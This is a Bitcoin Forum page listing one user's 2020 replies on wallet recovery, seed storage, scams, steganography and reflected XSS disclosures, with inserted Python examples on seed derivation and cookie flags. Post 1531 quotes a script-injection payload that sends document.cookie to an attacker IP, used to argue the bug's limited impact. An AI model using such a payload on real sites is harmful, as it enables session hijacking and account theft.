Bitcoin Forum
May 03, 2024, 04:50:34 AM *
  Show Posts
1521  Other / Beginners & Help / Re: Blockchain wallet shows insufficient funds when trying to send btc on: June 25, 2020, 03:49:06 PM
The procedure you mentioned, is it complicated?

You basically just have to download a software, follow the guide to verify its signature and then use your 12 words to recover your wallet. That's all.
Takes less than 5 minutes.

And for the future, you might want to stop using a web wallet.
Using a desktop-/mobile wallet gives you way more advantages and decreases the security risks.
1522  Bitcoin / Electrum / Re: Electrum and Ian Coleman's BiP39 on: June 24, 2020, 04:40:29 PM
Electrum does not use BIP 39.
It has its own mnemonic code derivation. Once the root key (BIP 38) is obtained, the derivation of the keys is the same. But the step from the mnemonic to the root key is different.

You won't be able to recreate your private keys from an electrum mnemonic using a BIP 39 software.
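The difference in the mnemonic-to-seed step, as an added example that is not part of the original post and not Electrum's own code: both schemes stretch the words with PBKDF2-HMAC-SHA512, but with different salts, and Electrum recognises its own mnemonics by a version prefix instead of the BIP 39 checksum. Function names are illustrative, and the sample words are the public BIP 39 test-vector mnemonic.

```python
import hashlib
import hmac
import unicodedata

ROUNDS = 2048  # both schemes use PBKDF2-HMAC-SHA512 with 2048 iterations
# Electrum tags its own mnemonics with a version prefix rather than a BIP 39 checksum.
ELECTRUM_PREFIXES = {"01": "standard", "100": "segwit", "101": "2fa", "102": "2fa_segwit"}

# Public BIP 39 test-vector mnemonic (sample input only; never use it for real funds).
SAMPLE = "abandon " * 11 + "about"


def electrum_normalize(text):
    """NFKD, lowercase, drop accents, collapse whitespace.
    Simplified: Electrum also removes spaces between CJK characters."""
    text = unicodedata.normalize("NFKD", text).lower()
    text = "".join(c for c in text if not unicodedata.combining(c))
    return " ".join(text.split())


def bip39_seed(mnemonic, passphrase=""):
    """BIP 39: the salt is the literal string 'mnemonic' plus the passphrase."""
    words = unicodedata.normalize("NFKD", mnemonic).encode()
    salt = ("mnemonic" + unicodedata.normalize("NFKD", passphrase)).encode()
    return hashlib.pbkdf2_hmac("sha512", words, salt, ROUNDS)


def electrum_seed(mnemonic, passphrase=""):
    """Electrum: same stretching, but the salt starts with 'electrum'."""
    words = electrum_normalize(mnemonic).encode()
    salt = ("electrum" + electrum_normalize(passphrase)).encode()
    return hashlib.pbkdf2_hmac("sha512", words, salt, ROUNDS)


def electrum_seed_type(mnemonic):
    """Return the Electrum seed type, or None if the words are not a
    current-format Electrum mnemonic."""
    digest = hmac.new(b"Seed version", electrum_normalize(mnemonic).encode(),
                      hashlib.sha512).hexdigest()
    for prefix, kind in ELECTRUM_PREFIXES.items():
        if digest.startswith(prefix):
            return kind
    return None


def compare(mnemonic):
    """Derive the seed both ways from the same words and report the result."""
    b, e = bip39_seed(mnemonic), electrum_seed(mnemonic)
    return {"bip39": b.hex(), "electrum": e.hex(),
            "same_seed": b == e, "electrum_type": electrum_seed_type(mnemonic)}


if __name__ == "__main__":
    for key, value in compare(SAMPLE).items():
        print(f"{key:14} {value}")
```

The same twelve words produce two unrelated 64-byte seeds, so every key derived afterwards differs as well.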
1523  Economy / Reputation / Re: Spotted this guy selling his Hero account! on: June 24, 2020, 04:35:24 PM
The case is quite complicated to me. To be honest I strongly believe this account has been placed for sale, as per all the evidence provided in the post/reply. But since Telegram has become a heaven for scammers and it's possible to edit images, a red tag shouldn't be left right now IMO.

If we could get any information from a moderator whether the mail address is the correct address of the account, it actually would be enough evidence.
But I doubt that any moderator will step in and give out this information "just because" of the sale of an account.
1524  Other / Beginners & Help / Re: Another way to hide your Seed and Private Keys on: June 24, 2020, 11:24:59 AM
If you print your seed on a paper, it may leave a file on the system (PC or Laptop) where you are printing, which is not safe. Writing seed on a paper using a pen is also safe.

So, do you usually write down a paper wallet including the private key and the QR?
Seems to be quite a lot of work.

Printing can under some circumstances leave traces, that's true.
Old print jobs might be accessible a long time after the print job is done.

That's why it is recommended to print from a live booted USB distro and to use a non-network printer with storage for print jobs.
You can use a printer without leaving traces, but a few extra steps have to be made.
1525  Bitcoin / Bitcoin Technical Support / Re: Sending USDT to BTC address on: June 24, 2020, 07:07:15 AM
I contacted them but they said it's out of control.😓
If there is another way please help me.

I think you misunderstood what pooya87 said:
the person controlling the private key of a cryptocurrency address can handle these things [...]

If you are not in control of the private keys, you can do nothing.

You made a mistake by sending an altcoin to a BTC address belonging to an exchange.
If they don't have the time or simply don't want to help you, you are out of luck. They don't have to help you. If they did, that would be because of goodwill.
1526  Other / Beginners & Help / Re: Avoiding/Detecting/Removing Viruses on: June 24, 2020, 06:38:41 AM
As for me I love to download files with crack license, sometimes I also think of the risk that my laptop might be compromised but when I tried one time and nothing happened to my files, I then continued to download more files/programs from different forums, [...]

I hope this is some kind of a joke?
You sir, are the next person to ask for help in the technical support section because of that.



[...] what's important here is to always read the review and download only those files with good reviews.

I hope you realize that this has nothing to do with the fact that the software includes a backdoor.
All those people (including you) care only about the functionality of the software. Instead of buying a license or just using a free open source alternative, you are risking all of your data.
If it works you'll find only positive ratings.

People using those cracks most probably are already infected. They just don't know and don't care.

1527  Economy / Reputation / Re: Spotted this guy selling his Hero account! on: June 23, 2020, 04:09:11 PM
Okay I understand your point. But if you see the screenshot I've shared and dkbit98's own screenshot, there's a small difference. The one I've shared had his email visible, while dkbit98's screenshot has hidden email.

That's true, but he could have manipulated the screenshot to create the impression that he is in possession of the account.
You (and we) simply can not be sure. He might be just a scammer without any account.

A message however, would unmistakably prove it.
1528  Economy / Reputation / Re: Spotted this guy selling his Hero account! on: June 23, 2020, 03:56:13 PM
Unfortunately there is no proof that he indeed is in possession of the account.

The next time when bringing something like this up, make sure to gain some proof that he really is in control of the account (e.g. by demanding a PM from this account).
With solid proof, this acc is going to receive negative trust ratings.
1529  Other / Beginners & Help / Re: Another way to hide your Seed and Private Keys on: June 23, 2020, 11:45:38 AM
Things we need to avoid while storing the Private keys are -
  • Never print on a paper or take a photo of a seed.

We can store the seed using a paper wallet, the cheapest, and the best way to hide the seed.

How can you claim that storing the seed printed on paper is insecure, while at the same time recommending a paper wallet?

Storing the seed on a piece of paper is not insecure by definition. However, it depends on the threat model, as always.
If an evil maid scenario is possible for you, storing it in plaintext on a piece of paper is insecure. If your physical storage however is safe, that's not the case.
1530  Local / Anfänger und Hilfe / Re: Questions about mixers on: June 23, 2020, 10:09:29 AM
Which providers would you recommend for the exchange?

Basically any trustworthy exchange.
Personally I would go with Binance, but the decision is yours.

If you want to exchange from/to fiat, Kraken is very well suited.



If by that you mean these "instant exchanges".. then just keep your hands off that sort of thing.
Almost all of them systematically scam people with KYC.

Which providers would you recommend for the exchange?

nobody01, I took the liberty of editing your post.
Otherwise the plagiarism bot might strike here because of a missing "bbcode tag".

Reports go to the moderator of the sub, so to you.
Are you afraid that you are too tired/drunk to be able to tell a missing quote tag from plagiarism?  Grin Grin Grin
1531  Other / Archival / Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection on: June 23, 2020, 09:17:37 AM
[...]
I do not know who naypalm is and it seems he last logged a week back is very infrequent here.
So I would disclose the vulnerability to the forum (only).

--------------------------
End of PM
--------------------------

So because he logs in infrequently you decided to publicly disclose it?
Because you need the attention and can't wait a month or two for it to be fixed?



Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community

All you can do is obviously to use the free version of the burp suite and make popups.
You found a reflected XSS, not a persistent one.

You like your low-level examples, I understood this already.

For example, this:
<script>
  image = new Image();
  image.src='https://[Attacker IP]:8080/?'+document.cookie;
</script>

This is only possible, if the HttpOnly flag is not set.
Otherwise the cookie can not be accessed by a script.

All you can do with that is to craft an own URL, and send it to someone to have the script being executed.

How would you exploit that on such a site, where no valuable or sensitive information is being stored/entered anyway?
Short answer: You can't.


You are obviously a script kiddy, breaking laws and being a dick, just to gain some attention.
You don't understand what you actually found and don't know how this could be exploited.
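The HttpOnly point in the post above can be checked from the defender's side by looking at the Set-Cookie headers a site sends. An added example, not part of the original post: the function names and the three header values are constructed for illustration.

```python
def parse_set_cookie(header):
    """Split one Set-Cookie header value into (name, attributes).
    Attribute names are case-insensitive, so they are lowercased."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, _value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), attrs


def audit_cookies(headers):
    """Report, per cookie, the protections that are missing.

    - no HttpOnly: the value is visible to page scripts through
      document.cookie, so any script running in the page can read it.
    - no Secure: the browser also sends the cookie over plain HTTP.
    """
    report = {}
    for header in headers:
        name, attrs = parse_set_cookie(header)
        issues = []
        if "httponly" not in attrs:
            issues.append("script-readable (no HttpOnly)")
        if "secure" not in attrs:
            issues.append("sent over plain HTTP (no Secure)")
        report[name] = issues
    return report


def script_readable(headers):
    """Names of the cookies a page script could read."""
    return sorted(name for name, issues in audit_cookies(headers).items()
                  if any("HttpOnly" in issue for issue in issues))


# Constructed sample headers (not captured from any real site).
SAMPLE_HEADERS = [
    "SESSIONID=abc123; Path=/",
    "auth=eyJ0eXAi; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/; secure",
]

if __name__ == "__main__":
    for cookie, issues in audit_cookies(SAMPLE_HEADERS).items():
        print(cookie, "->", ", ".join(issues) or "ok")
```

A session cookie that shows up as script-readable is the one to fix first; a preference cookie such as `theme` usually needs no HttpOnly.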
1532  Other / Beginners & Help / Re: Listing accounts and private keys in a Folder WINDOWS10 on: June 22, 2020, 04:35:40 PM
Don't do this.

This gives you a false sense of security.

It is completely absurd to encrypt something with the password being directly accessible.

Anyone can access your folder and check the content (including your password) of your script. That's completely useless.


@OP
The next time you copy something, at least include the URL to the source (https://www.makeuseof.com/tag/password-protect-folder-windows/).
You don't need to plagiarize useless things like this, risking your account to be banned.
1533  Other / Archival / Re: [mohfw Bangladesh] vulnerable to XSS on: June 22, 2020, 11:01:04 AM
And again..

A completely worthless reflected XSS.
Did you even realize that the connection is not secured by TLS? Do you really think they care about a reflected XSS when they already don't care about security at all?

Do you have the permission from the owner of the website and the hoster to check for vulnerabilities?
Why did you publicly post it instead of responsibly disclosing it to the owner?
1534  Other / Archival / Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection on: June 22, 2020, 10:17:08 AM
What I see is a new hacker trying to prove himself, and doing the right thing by not exploiting what he found.

He did exploit the vulnerability by creating the PoC popup.
There is not much more you can do with a reflected XSS on such a site. That's basically it.


Warning to future ethical hackers: Do not contact OG about vulnerabilities - he will accuse you of a crime.

An ethical hacker would not start to pentest a site/server without the permission of the owner and hoster.
It's more of a script kiddy move. And a pretty dumb one.
1535  Bitcoin / Hardware wallets / Re: Trezor or Ledger? And how to get my forks Bitcoin Cash / Gold / SV?? on: June 21, 2020, 03:35:22 PM
Whether you actually "import" it into a "software" or enter it into a script doesn't really make a difference.
Difference is in approach. It’s one thing to import a key into software that resides on computer designated for routine day-to-day work and quite another matter to do it with the script (btw, which is easy to check) living on air-gapped device. I think you can understand which one of two is the safest way.

You need to keep the context in mind.
We were never speaking about air-gapped vs online.

HusnaQA simply said:
Paper Wallet is only a printout that contains a Bitcoin address or public key that allows transferring coins to the wallet, and a private key that gives access to send funds. This Private Key is imported into other software for sending funds.

That statement itself is true.
Whether you import it into a "software" or use a "script", doesn't matter at all.

What matters is whether you are entering your private key into an online device or an air-gapped one. But that was never a point from HusnaQA.


If we compare air-gapped devices, it doesn't matter whether you use a "software" or a "script". Same for online devices.

Offline is better than online. But "software" vs "script" doesn't matter at all.
1536  Other / Beginners & Help / Re: Another way to hide your Seed and Private Keys on: June 21, 2020, 03:31:38 PM
Confidentiality: Your mnemonic code is not encrypted. It is visible for anyone who looks for it.
First that one should find it  Grin , it is invisible.

And yet, your method does not protect the confidentiality of the information.


Integrity: Anyone can change your mnemonic, append new words, delete words etc.
Again. try to find it if it is supposed to be invisible  Grin

And yet, your method does not protect the integrity.

Your method does not increase the security of your data.
1537  Other / Beginners & Help / Re: Another way to hide your Seed and Private Keys on: June 21, 2020, 01:44:37 PM
Hide means make something invisible, right? I would use invisible UV ink to write down my explicit SEED between the lines somewhere in the middle of the thick book which is on the shelf among dozens of other books. Conveniently, securely and safely...isn't it?

Where is the security?
I don't see any security here:
Confidentiality: Your mnemonic code is not encrypted. It is visible for anyone who looks for it.
Integrity: Anyone can change your mnemonic, append new words, delete words etc.
Availability: Books are not known for being very resilient against water/fire etc.

All you did was to hide your mnemonic.
Same could be applied by writing it on a piece of paper and putting it into the drawer.



Well, I’m not that half-witted to not remember what a single specific book looks like or not memorize the one page number which coincides with my mother’s birthday, squared (everyone can choose his favorite number). And as for degradation - I suppose it could be refreshed any time if necessary

Despite the lack of security (as mentioned above), what about an accident (e.g. a car hits you)?


There is nothing against hiding secret information. But you shouldn't exclusively rely on that to secure your information.
1538  Local / Anfänger und Hilfe / Re: Steganography on: June 21, 2020, 01:02:05 PM
Robust in the sense that reading out the secret later is still possible even after the image has been modified.
If I already have to do KYC, then I would also like to hide something in the (ID card) picture. Should the picture turn up somewhere else, perhaps with a different name and date of birth, then I would like to have something like a transparent watermark or similar hidden in the picture as a secret, so that I can cross-check it. And this transparent watermark as a 2nd layer in the picture, hidden in the background. The secret should then read, e.g.: "Upload on 30.02.2020 to blablabla". And that repeats across the whole picture.

Otherwise I have considered using stereograms. So the secret is hidden, and when the half-image is slid over it as a solution mask, the secret becomes visible. But I need to play around with that a bit.


You could have mentioned that right away  Grin
Steganography in the sense of hiding information and a watermark like this are realized in a similar way, but they have different goals and therefore also different approaches.

There are algorithms that are very robust. With them you can quite easily embed an invisible watermark. And with a secret key or the original image you can then read the watermark out again.

Something like this, however, is often used for copyright purposes or data collection (e.g. how often was ad image X shared on FB).


That won't directly protect you from nonsense being done with your ID picture. If push comes to shove, you can of course still prove in court that there is a watermark in it.
But the other question is.. what stops you from embedding a watermark that says "KYC for ... Upload 2016" and then using it today. Later you could simply claim that the picture was made in 2016 for something completely different.
I think something like this wouldn't achieve much legally.

It would be better, I think, to use a visible watermark.
But since many don't want to accept edited pictures, pretty much the only thing that helps is a small note with the date and purpose of the picture laid more or less across the ID, without covering important information. But still in such a way that it can't simply be cropped out.
You pretty much can't cheat there. Nobody would accept the picture today if it says "2016.. for X".


TLDR:
  • Digital watermarks (invisible) are a nice thing in themselves. They are robust and can't simply be deleted. Unfortunately, in my opinion, they don't help you much here.
  • Visible digital watermarks can be removed very easily with the help of a simple AI. So that doesn't help much either.
  • A note across the picture, placed so that it can't be cropped out but still shows enough information for the service you want to register with, is what I consider the best method.
1539  Bitcoin / Bitcoin Discussion / Re: where are private keys stored? on: June 21, 2020, 12:48:10 PM
So is it right to say in case of etherdelta the private key is stored in my browser cache? If yes that means anyone who can access my cache can also see my key?

I don't know how etherdelta works exactly.
But it is not in the cache. It is either in the storage of your browser (most likely since I guess you don't have to "upload" it manually, right?) or a file on your computer (if you need to choose the file each time by "uploading" it).

In both cases. If someone has access to your browser (i.e. by having access to your device), and the wallet file / private keys are not encrypted, they have full access, yes.
1540  Bitcoin / Bitcoin Technical Support / Re: BTC Reward. How to compile Electrum standalone executable from Python source cod on: June 21, 2020, 12:45:01 PM
Excuse my noobness, but from this official windows binaries build page, if I understand correctly, you need to download a fresh clone from github.

BUT, my intention is to build from the file I downloaded, which is Electrum-3.3.8.tar.gz which I extracted to Electrum-3.3.8 directory. I only want to build Electrum Standalone Executable from this directory and not from a clone from github.

Is this the only possibility? Can anyone confirm? Yes / No

If cloning from github is the only possibility to do this, then I've set up an unrealistic goal from the start which only became apparent now Sad

You don't need to clone it from github again.
You can definitely use your downloaded (and extracted) .tar.gz.


Just skip the following commands:

$ git checkout $REV

You can keep the rest as it is.
Just make sure that your extracted archive is in the folder "electrum" as it would be when cloning the repository directly and you are fine to go.